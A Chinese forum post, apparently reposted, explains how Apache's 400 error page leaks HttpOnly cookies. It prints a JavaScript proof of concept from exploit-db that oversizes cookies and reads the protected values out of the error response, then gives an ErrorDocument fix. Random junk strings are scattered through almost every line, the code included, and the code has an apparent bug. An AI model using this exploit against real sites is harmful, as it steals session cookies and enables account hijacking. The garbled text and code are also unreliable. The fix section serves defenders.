很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。, i+ e* s% x( U5 p* o- B; Z9 R& U
" `8 ~# `4 S$ r$ Z3 l, A用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
" Q- ?* M: v% K6 x
" K' T6 Y4 b4 p) K
% a: k5 ]8 Y' ^9 f// http://www.exploit-db.com/exploits/18442/. y9 L7 W% B6 I$ x
function setCookies (good) {
6 {# ?- r+ r9 z/ O// Construct string for cookie value
( ~. x3 u+ P' _1 K; mvar str = "";
; ?0 n. w1 [" d: j& u9 i4 ^: g7 {# lfor (var i=0; i< 819; i++) {
T3 V/ e0 e( W: I4 zstr += "x";
& X2 }2 u0 x; V8 P% z) b}- k# R! b2 k! k
// Set cookies/ I! U+ j: A# d8 G Z1 D' {# m
for (i = 0; i < 10; i++) {
+ D0 b i/ H) {/ R/ X! z// Expire evil cookie; i9 v. J3 X' |% D
if (good) {" B3 A& ^% @3 O2 ^" z/ A* r4 L+ A' `
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
3 s. G" V# E5 z" R}# ]7 u. g" X+ m% B) I
// Set evil cookie
7 g2 [, m/ t7 Q6 v+ P+ O0 s% Q u& belse {
2 O) z6 \' Z+ kvar cookie = "xss"+i+"="+str+";path=/";
8 \4 K9 }2 ]; Z$ t/ d}. C. z' G( }! @1 O9 |( Z
document.cookie = cookie;- X' e& \/ Y- Y/ O- Z# ^' H
}
4 y1 T7 k3 h% U}# M8 b; e0 r' }2 ` p" w
function makeRequest() {8 q5 }1 C1 J# l' [# l) E
setCookies();
" n' U. x( K. z1 N! {. B2 afunction parseCookies () {
- r- U6 \' N5 e' e( R4 mvar cookie_dict = {};
8 F; h2 _/ F' I {) M// Only react on 400 status
0 N( f1 z" v/ O& J4 Y% v2 [9 x/ q4 dif (xhr.readyState === 4 && xhr.status === 400) {
& Y. s/ n% s0 y/ H& ^9 A4 `) ]// Replace newlines and match <pre> content- P* v* y* I4 Z$ ]
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);& K. q( M" ]. T/ v
if (content.length) {
) ?' c7 M4 S& \+ b1 R9 A9 X// Remove Cookie: prefix; i' m( k3 E$ |5 L' z
content = content[1].replace("Cookie: ", "");
9 c! U( {* f% @$ Q/ R. x$ Jvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);: b% u- Z- _: p0 h- P, i
// Add cookies to object
" ~1 [% J- U# |* [1 r9 hfor (var i=0; i<cookies.length; i++) {
6 n, s6 U$ T/ V9 I$ J/ r- q) l4 S* Bvar s_c = cookies.split('=',2);/ v( E% v/ A- j( _* f
cookie_dict[s_c[0]] = s_c[1];
1 t5 ] r0 M1 i1 M- W" } |" C}% ^8 l$ X. L% u% S" a/ A
}/ ^) i/ C# R' _' t: X* G+ H
// Unset malicious cookies- {6 f1 Y0 _; A8 b
setCookies(true);4 x% r- _1 s0 H- N
alert(JSON.stringify(cookie_dict));& V1 v5 g; T2 x5 v
}) S. m# c5 p+ B w! r. t" f
}! Z. b4 o4 C4 Q1 O# p/ `5 E
// Make XHR request* p i, E! d, N3 _. m& r
var xhr = new XMLHttpRequest();, G3 n0 V t0 u* D; c h
xhr.onreadystatechange = parseCookies;1 w" Z+ p: V$ }9 x: V
xhr.open("GET", "/", true);
+ | L& E- y1 d8 O3 @& S+ Pxhr.send(null);, l1 K. H, w" m1 k" E/ A
}
5 F2 r* ~' V3 Z+ H' ^makeRequest();: [6 I5 R+ W$ ^* W
0 `; h% Y: I* P+ o/ a) R. V# W
你就能看见华丽丽的400错误包含着cookie信息。
$ P$ |- i+ q" }% B. k; q! J/ g: x4 Y& E; x% Q2 e- i
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
) U6 H2 a L+ p* L; B( S/ M* F& Y
修复方案:1 i( k- g2 Z' y- P
+ W* H# X! {1 V& i. ]
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下1 W1 k; i3 u l( n; T
; g6 E0 Q* x4 r& Z4 M+ ]% @In the event of a problem or error, Apachecan be configured to do one of four things,
7 ~ @7 d( z* P! J" z+ K8 C9 l F C D1 ?+ _
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. R0 c1 Y* Z4 _( ]2. output acustomized message输出一段信息8 K) n5 T0 O# g- O. ]- p+ z, b ^
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 8 z; r/ U/ B" O. z4 u' R
4. redirect to an external URL to handle theproblem/error转向一个外部URL; d% G( B9 N4 C% C+ {3 q
: U. ` e- P7 M1 }经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容$ E' ~1 w( r, F& x+ p6 B
, E' |4 C& C+ C. `Apache配置:
6 O1 {7 W# a: _: _1 |! x
. @+ {& T( T2 d# `" H0 f. nErrorDocument400 " security test"9 |6 m8 e3 ], p5 M( `( h: X% V
0 o7 ]. C9 i Z) i当然,升级apache到最新也可:)。3 K& m9 c+ A& V
$ d& r% B# a% h3 r8 W4 k- B
参考:http://httpd.apache.org/security/vulnerabilities_22.html [( [+ ^. X% V6 c$ H
; q$ _$ p9 o0 t% i9 t |